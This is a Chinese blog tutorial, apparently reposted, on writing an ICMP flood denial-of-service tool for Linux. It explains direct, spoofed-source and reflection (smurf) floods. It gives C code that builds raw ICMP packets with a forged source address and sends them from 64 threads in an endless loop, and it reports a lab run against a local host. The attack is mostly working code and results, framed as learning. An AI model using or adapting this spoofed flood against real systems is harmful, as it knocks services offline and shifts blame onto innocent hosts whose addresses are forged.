Linux编程之ICMP洪水攻击
<p>我的上一篇文章《linux编程之ping的实现》里使用icmp协议实现了ping的程序,icmp除了实现这么一个ping程序,还有哪些不为人知或者好玩的用途?这里我将介绍icmp另一个很有名的黑科技:icmp洪水攻击。 </p>
<p>
icmp洪水攻击属于大名鼎鼎的dos(denial of service)攻击的一种,一种是黑客们喜欢的攻击手段,这里本着加深自己对icmp的理解的目的,也试着基于icmp写一段icmp的洪水攻击小程序。 </p>
<p>
洪水攻击(flood attack)指的是利用计算机网络技术向目的主机发送大量无用数据报文,使得目的主机忙于处理无用的数据报文而无法提供正常服务的网络行为。</p>
<p>
icmp洪水攻击:顾名思义,就是对目的主机发送洪水般的ping包,使得目的主机忙于处理ping包而无能力处理其他正常请求,这就好像是洪水一般的ping包把目的主机给淹没了。 </p>
<p>
要实现icmp的洪水攻击,需要以下三项的知识储备:</p>
<ul>
<li>
dos攻击原理</li>
<li>
icmp的深入理解</li>
<li>
原始套接字的编程技巧</li>
</ul>
<p>
<strong>一、icmp洪水攻击原理</strong></p>
<p>
icmp洪水攻击是在ping的基础上形成的,但是ping程序很少能造成目的及宕机的问题,这是因为ping的发送包的速率太慢了,像我实现的ping程序里ping包发送速率限定在1秒1发,这个速率目的主机处理ping包还是绰绰有余的。所以要造成“洪水”的现象,就必须提升发包速率。这里介绍三种icmp洪水攻击的方式: </p>
<p>
(1)直接洪水攻击</p>
<p>
这样做需要本地主机的带宽和目的主机的带宽之间进行比拼,比如我的主机网络带宽是30m的,而你的主机网络带宽仅为3m,那我发起洪水攻击淹没你的主机成功率就很大了。这种攻击方式要求攻击主机处理能力和带宽要大于被攻击主机,否则自身被dos了。基于这种思想,我们可以使用一台高带宽高性能的电脑,采用多线程的方法一次性发送多个icmp请求报文,让目的主机忙于处理大量这些报文而造成速度缓慢甚至宕机。这个方法有个大缺点,就是对方可以根据icmp包的ip地址而屏蔽掉攻击源,使得攻击不能继续。 </p>
<p>
(2)伪ip攻击</p>
<p>
在直接洪水攻击的基础上,我们将发送方的ip地址伪装成其他ip,如果是伪装成一个随机的ip,那就可以很好地隐藏自己的位置;如果将自己的ip伪装成其他受害者的ip,就会造成“挑拨离间”的情形,受害主机1的icmp回复包也如洪水般发送给受害主机2,如果主机1的管理员要查是哪个混蛋发包攻击自己,他一查icmp包的源地址,咦原来是主机2,这样子主机2就成了戴罪羔羊了。 </p>
<p>
(3)反射攻击</p>
<p>
这类攻击的思想不同于上面两种攻击,反射攻击的设计更为巧妙。其实这里的方式三的攻击模式是前两个模式的合并版以及升级版,方式三的攻击策略有点像“借刀杀人“,反射攻击不再直接对目标主机,而是让其他一群主机误以为目标主机在向他们发送icmp请求包,然后一群主机向目的主机发送icmp应答包,造成来自四面八方的洪水淹没目的主机的现象。比如我们向局域网的其他主机发送icmp请求包,然后自己的ip地址伪装成目的主机的ip,这样子目的主机就成了icmp回显的焦点了。这种攻击非常隐蔽,因为受害主机很难查出攻击源是谁。 </p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/b415f6745b5a0cd927f20c5ae4deb731.jpg"></p>
<p>
<strong>二、icmp洪水攻击程序设计</strong></p>
<p>
这里我想实现一个icmp洪水攻击的例子,这里我想采用方式二来进行设计。虽说方式三的“借刀杀人”更为巧妙,其实也是由方式二的伪装方式进一步延伸的,实现起来也是大同小异。 </p>
<p>
首先给出攻击的模型图:</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/6582fa199d47711486f7651251bf3a9b.jpg"></p>
<p>
<span><strong>1.组icmp包</strong></span></p>
<p>
这里的组包跟编写ping程序时的组包没太大差别,唯一需要注意的是,我们需要填写ip头部分,因为我们要伪装源地址,做到嫁祸于人。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterbash" id="highlighter_204878">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="bash plain">void dos_icmp_pack(char* packet)</code>
</div>
<div class="line number2 index1 alt1">
<code class="bash plain">{</code>
</div>
<div class="line number3 index2 alt2">
<code class="bash spaces"> </code><code class="bash plain">struct ip* ip_hdr = (struct ip*)packet;</code>
</div>
<div class="line number4 index3 alt1">
<code class="bash spaces"> </code><code class="bash plain">struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));</code>
</div>
<div class="line number5 index4 alt2">
</div>
<div class="line number6 index5 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_v = 4;</code>
</div>
<div class="line number7 index6 alt2">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_hl = 5;</code>
</div>
<div class="line number8 index7 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_tos = 0;</code>
</div>
<div class="line number9 index8 alt2">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_len = htons(icmp_packet_size);</code>
</div>
<div class="line number10 index9 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_id = htons(getpid());</code>
</div>
<div class="line number11 index10 alt2">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_off = 0;</code>
</div>
<div class="line number12 index11 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_ttl = 64;</code>
</div>
<div class="line number13 index12 alt2">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_p = proto_icmp;</code>
</div>
<div class="line number14 index13 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_sum = 0;</code>
</div>
<div class="line number15 index14 alt2">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_src.s_addr = inet_addr(fake_ip);; </code><code class="bash plain">//</code><code class="bash plain">伪装源地址</code>
</div>
<div class="line number16 index15 alt1">
<code class="bash spaces"> </code><code class="bash plain">ip_hdr->ip_dst.s_addr = dest; </code><code class="bash plain">//</code><code class="bash plain">填入要攻击的目的主机地址</code>
</div>
<div class="line number17 index16 alt2">
</div>
<div class="line number18 index17 alt1">
<code class="bash spaces"> </code><code class="bash plain">icmp_hdr->icmp_type = icmp_echo;</code>
</div>
<div class="line number19 index18 alt2">
<code class="bash spaces"> </code><code class="bash plain">icmp_hdr->icmp_code = 0;</code>
</div>
<div class="line number20 index19 alt1">
<code class="bash spaces"> </code><code class="bash plain">icmp_hdr->icmp_cksum = htons(~(icmp_echo << 8));</code>
</div>
<div class="line number21 index20 alt2">
<code class="bash spaces"> </code><code class="bash plain">//</code><code class="bash plain">注意这里,因为数据部分为0,我们就简化了一下checksum的计算了</code>
</div>
<div class="line number22 index21 alt1">
<code class="bash plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<span><strong>2.搭建发包线程</strong></span></p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterbash" id="highlighter_859693">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="bash plain">void dos_attack()</code>
</div>
<div class="line number2 index1 alt1">
<code class="bash plain">{</code>
</div>
<div class="line number3 index2 alt2">
<code class="bash spaces"> </code><code class="bash plain">char* packet = (char*)malloc(icmp_packet_size);</code>
</div>
<div class="line number4 index3 alt1">
<code class="bash spaces"> </code><code class="bash plain">memset(packet, 0, icmp_packet_size);</code>
</div>
<div class="line number5 index4 alt2">
<code class="bash spaces"> </code><code class="bash plain">struct sockaddr_in to;</code>
</div>
<div class="line number6 index5 alt1">
<code class="bash spaces"> </code><code class="bash plain">dos_icmp_pack(packet);</code>
</div>
<div class="line number7 index6 alt2">
</div>
<div class="line number8 index7 alt1">
<code class="bash spaces"> </code><code class="bash plain">to.sin_family = af_inet;</code>
</div>
<div class="line number9 index8 alt2">
<code class="bash spaces"> </code><code class="bash plain">to.sin_addr.s_addr = dest;</code>
</div>
<div class="line number10 index9 alt1">
<code class="bash spaces"> </code><code class="bash plain">to.sin_port = htons(0);</code>
</div>
<div class="line number11 index10 alt2">
</div>
<div class="line number12 index11 alt1">
<code class="bash spaces"> </code><code class="bash keyword">while</code><code class="bash plain">(alive) </code><code class="bash plain">//</code><code class="bash plain">控制发包的全局变量</code>
</div>
<div class="line number13 index12 alt2">
<code class="bash spaces"> </code><code class="bash plain">{</code>
</div>
<div class="line number14 index13 alt1">
<code class="bash spaces"> </code><code class="bash plain">sendto(rawsock, packet, icmp_packet_size, 0, (struct sockaddr*)&to, sizeof(struct sockaddr)); </code>
</div>
<div class="line number15 index14 alt2">
<code class="bash spaces"> </code><code class="bash plain">}</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="bash spaces"> </code><code class="bash functions">free</code><code class="bash plain">(packet); </code><code class="bash plain">//</code><code class="bash plain">记得要释放内存</code>
</div>
<div class="line number18 index17 alt1">
<code class="bash plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<span><strong>3.编写发包开关</strong></span></p>
<p>
这里的开关很简单,用信号量+全局变量即可以实现。当我们按下ctrl+c时,攻击将关闭。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterbash" id="highlighter_935902">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="bash plain">void dos_sig()</code>
</div>
<div class="line number2 index1 alt1">
<code class="bash plain">{</code>
</div>
<div class="line number3 index2 alt2">
<code class="bash spaces"> </code><code class="bash plain">alive = 0;</code>
</div>
<div class="line number4 index3 alt1">
<code class="bash spaces"> </code><code class="bash functions">printf</code><code class="bash plain">(</code><code class="bash string">"stop dos attack!\n"</code><code class="bash plain">);</code>
</div>
<div class="line number5 index4 alt2">
<code class="bash plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<span><strong> 4.总的架构</strong></span></p>
<p>
我们使用了64个线程一起发包,当然这个线程数还可以大大增加,来增加攻击强度。但我们只是做做实验,没必要搞那么大。</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightercpp" id="highlighter_406408">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
<div class="line number24 index23 alt1">
24</div>
<div class="line number25 index24 alt2">
25</div>
<div class="line number26 index25 alt1">
26</div>
<div class="line number27 index26 alt2">
27</div>
<div class="line number28 index27 alt1">
28</div>
<div class="line number29 index28 alt2">
29</div>
<div class="line number30 index29 alt1">
30</div>
<div class="line number31 index30 alt2">
31</div>
<div class="line number32 index31 alt1">
32</div>
<div class="line number33 index32 alt2">
33</div>
<div class="line number34 index33 alt1">
34</div>
<div class="line number35 index34 alt2">
35</div>
<div class="line number36 index35 alt1">
36</div>
<div class="line number37 index36 alt2">
37</div>
<div class="line number38 index37 alt1">
38</div>
<div class="line number39 index38 alt2">
39</div>
<div class="line number40 index39 alt1">
40</div>
<div class="line number41 index40 alt2">
41</div>
<div class="line number42 index41 alt1">
42</div>
<div class="line number43 index42 alt2">
43</div>
<div class="line number44 index43 alt1">
44</div>
<div class="line number45 index44 alt2">
45</div>
<div class="line number46 index45 alt1">
46</div>
<div class="line number47 index46 alt2">
47</div>
<div class="line number48 index47 alt1">
48</div>
<div class="line number49 index48 alt2">
49</div>
<div class="line number50 index49 alt1">
50</div>
<div class="line number51 index50 alt2">
51</div>
<div class="line number52 index51 alt1">
52</div>
<div class="line number53 index52 alt2">
53</div>
<div class="line number54 index53 alt1">
54</div>
<div class="line number55 index54 alt2">
55</div>
<div class="line number56 index55 alt1">
56</div>
<div class="line number57 index56 alt2">
57</div>
<div class="line number58 index57 alt1">
58</div>
<div class="line number59 index58 alt2">
59</div>
<div class="line number60 index59 alt1">
60</div>
<div class="line number61 index60 alt2">
61</div>
<div class="line number62 index61 alt1">
62</div>
<div class="line number63 index62 alt2">
63</div>
<div class="line number64 index63 alt1">
64</div>
<div class="line number65 index64 alt2">
65</div>
<div class="line number66 index65 alt1">
66</div>
<div class="line number67 index66 alt2">
67</div>
<div class="line number68 index67 alt1">
68</div>
<div class="line number69 index68 alt2">
69</div>
<div class="line number70 index69 alt1">
70</div>
<div class="line number71 index70 alt2">
71</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="cpp color1 bold">int</code> <code class="cpp plain">main(</code><code class="cpp color1 bold">int</code> <code class="cpp plain">argc, </code><code class="cpp color1 bold">char</code><code class="cpp plain">* argv[])</code>
</div>
<div class="line number2 index1 alt1">
<code class="cpp plain">{</code>
</div>
<div class="line number3 index2 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">struct</code> <code class="cpp plain">hostent* host = null;</code>
</div>
<div class="line number4 index3 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">struct</code> <code class="cpp plain">protoent* protocol = null;</code>
</div>
<div class="line number5 index4 alt2">
<code class="cpp spaces"> </code><code class="cpp color1 bold">int</code> <code class="cpp plain">i;</code>
</div>
<div class="line number6 index5 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">alive = 1;</code>
</div>
<div class="line number7 index6 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">pthread_t attack_thread; </code><code class="cpp comments">//开64个线程同时发包 </code>
</div>
<div class="line number8 index7 alt1">
<code class="cpp spaces"> </code><code class="cpp color1 bold">int</code> <code class="cpp plain">err = 0;</code>
</div>
<div class="line number9 index8 alt2">
</div>
<div class="line number10 index9 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(argc < 2)</code>
</div>
<div class="line number11 index10 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number12 index11 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"invalid input!\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number13 index12 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">return</code> <code class="cpp plain">-1;</code>
</div>
<div class="line number14 index13 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number15 index14 alt2">
</div>
<div class="line number16 index15 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">signal</code><code class="cpp plain">(sigint, dos_sig);</code>
</div>
<div class="line number17 index16 alt2">
</div>
<div class="line number18 index17 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">protocol = getprotobyname(proto_name);</code>
</div>
<div class="line number19 index18 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(protocol == null)</code>
</div>
<div class="line number20 index19 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number21 index20 alt2">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"fail to getprotobyname!\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number22 index21 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">return</code> <code class="cpp plain">-1;</code>
</div>
<div class="line number23 index22 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number24 index23 alt1">
</div>
<div class="line number25 index24 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">proto_icmp = protocol->p_proto;</code>
</div>
<div class="line number26 index25 alt1">
</div>
<div class="line number27 index26 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">dest = inet_addr(argv);</code>
</div>
<div class="line number28 index27 alt1">
</div>
<div class="line number29 index28 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(dest == inaddr_none)</code>
</div>
<div class="line number30 index29 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number31 index30 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">host = gethostbyname(argv);</code>
</div>
<div class="line number32 index31 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(host == null)</code>
</div>
<div class="line number33 index32 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number34 index33 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"invalid ip or domain name!\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number35 index34 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">return</code> <code class="cpp plain">-1;</code>
</div>
<div class="line number36 index35 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number37 index36 alt2">
<code class="cpp spaces"> </code><code class="cpp functions bold">memcpy</code><code class="cpp plain">((</code><code class="cpp color1 bold">char</code><code class="cpp plain">*)&dest, host->h_addr, host->h_length);</code>
</div>
<div class="line number38 index37 alt1">
</div>
<div class="line number39 index38 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number40 index39 alt1">
</div>
<div class="line number41 index40 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">rawsock = socket(af_inet, sock_raw, proto_icmp);</code>
</div>
<div class="line number42 index41 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(rawsock < 0)</code>
</div>
<div class="line number43 index42 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number44 index43 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"fait to create socket!\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number45 index44 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">return</code> <code class="cpp plain">-1;</code>
</div>
<div class="line number46 index45 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number47 index46 alt2">
</div>
<div class="line number48 index47 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">setsockopt(rawsock, sol_ip, ip_hdrincl, </code><code class="cpp string">"1"</code><code class="cpp plain">, </code><code class="cpp keyword bold">sizeof</code><code class="cpp plain">(</code><code class="cpp string">"1"</code><code class="cpp plain">));</code>
</div>
<div class="line number49 index48 alt2">
</div>
<div class="line number50 index49 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"icmp flood attack start\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number51 index50 alt2">
</div>
<div class="line number52 index51 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">for</code><code class="cpp plain">(i=0;i<thread_max_num;i++)</code>
</div>
<div class="line number53 index52 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number54 index53 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">err = pthread_create(&(attack_thread), null, (</code><code class="cpp keyword bold">void</code><code class="cpp plain">*)dos_attack, null);</code>
</div>
<div class="line number55 index54 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">if</code><code class="cpp plain">(err)</code>
</div>
<div class="line number56 index55 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number57 index56 alt2">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"fail to create thread, err %d, thread id : %d\n"</code><code class="cpp plain">,err, attack_thread); </code>
</div>
<div class="line number58 index57 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number59 index58 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number60 index59 alt1">
</div>
<div class="line number61 index60 alt2">
<code class="cpp spaces"> </code><code class="cpp keyword bold">for</code><code class="cpp plain">(i=0;i<thread_max_num;i++)</code>
</div>
<div class="line number62 index61 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">{</code>
</div>
<div class="line number63 index62 alt2">
<code class="cpp spaces"> </code><code class="cpp plain">pthread_join(attack_thread, null); </code><code class="cpp comments">//等待线程结束</code>
</div>
<div class="line number64 index63 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">}</code>
</div>
<div class="line number65 index64 alt2">
</div>
<div class="line number66 index65 alt1">
<code class="cpp spaces"> </code><code class="cpp functions bold">printf</code><code class="cpp plain">(</code><code class="cpp string">"icmp attack finishi!\n"</code><code class="cpp plain">);</code>
</div>
<div class="line number67 index66 alt2">
</div>
<div class="line number68 index67 alt1">
<code class="cpp spaces"> </code><code class="cpp plain">close(rawsock);</code>
</div>
<div class="line number69 index68 alt2">
</div>
<div class="line number70 index69 alt1">
<code class="cpp spaces"> </code><code class="cpp keyword bold">return</code> <code class="cpp plain">0;</code>
</div>
<div class="line number71 index70 alt2">
<code class="cpp plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<strong>三、实验</strong></p>
<p>
本次实验本着学习的目的,想利用自己手上的设备,想进一步理解网络和协议的应用,所以攻击的幅度比较小,时间也就几秒,不对任何设备造成影响。 </p>
<p>
再说一下我们的攻击步骤:我们使用主机172.0.5.183作为自己的攻击主机,并将自己伪装成主机172.0.5.182,对主机172.0.5.9发起icmp洪水攻击。</p>
<p>
攻击开始</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/38f845cbd83eab76cd8bb996ad1719e4.jpg"></p>
<p>
我们观察一下”受害者“那边的情况。在短短5秒里,正确收到并交付上层处理的包也高达7万多个了。我也不敢多搞事,避免影响机器工作。</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" src="https://zhuji.jb51.net/uploads/img/202305/d680b4f31a7909c6ebc24369d6a39d9d.jpg"></p>
<p>
使用wireshark抓包再瞧一瞧,满满的icmp包啊,看来量也是很大的。icmp包的源地址显示为172.0.5.182(我们伪装的地址),它也把echo reply回给了172.0.5.182。主机172.0.5.182肯定会想,莫名其妙啊,怎么收到这么多echo reply包。</p>
<p>
<img title="Linux编程之ICMP洪水攻击" alt="Linux编程之ICMP洪水攻击" id="theimg" src="https://zhuji.jb51.net/uploads/img/202305/04129861e73548d512de02802d4356c1.jpg"></p>
<p>
攻击实验做完了。 </p>
<p>
现在更为流行的是ddos攻击,其威力更为强悍,策略更为精巧,防御难度也更加高。<br>
其实,这种ddos攻击也是在dos的基础上发起的,具体步骤如下: </p>
<p>
1. 攻击者向“放大网络”广播echo request报文<br>
2. 攻击者指定广播报文的源ip为被攻击主机<br>
3. “放大网络”回复echo reply给被攻击主机<br>
4. 形成ddos攻击场景 </p>
<p>
这里的“放大网络”可以理解为具有很多主机的网络,这些主机的操作系统需要支持对目的地址为广播地址的某种icmp请求数据包进行响应。 </p>
<p>
攻击策略很精妙,简而言之,就是将源地址伪装成攻击主机的ip,然后发广播的给所有主机,主机们收到该echo request后集体向攻击主机回包,造成群起而攻之的情景。</p>
<p>
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。</p>
頁:
[1]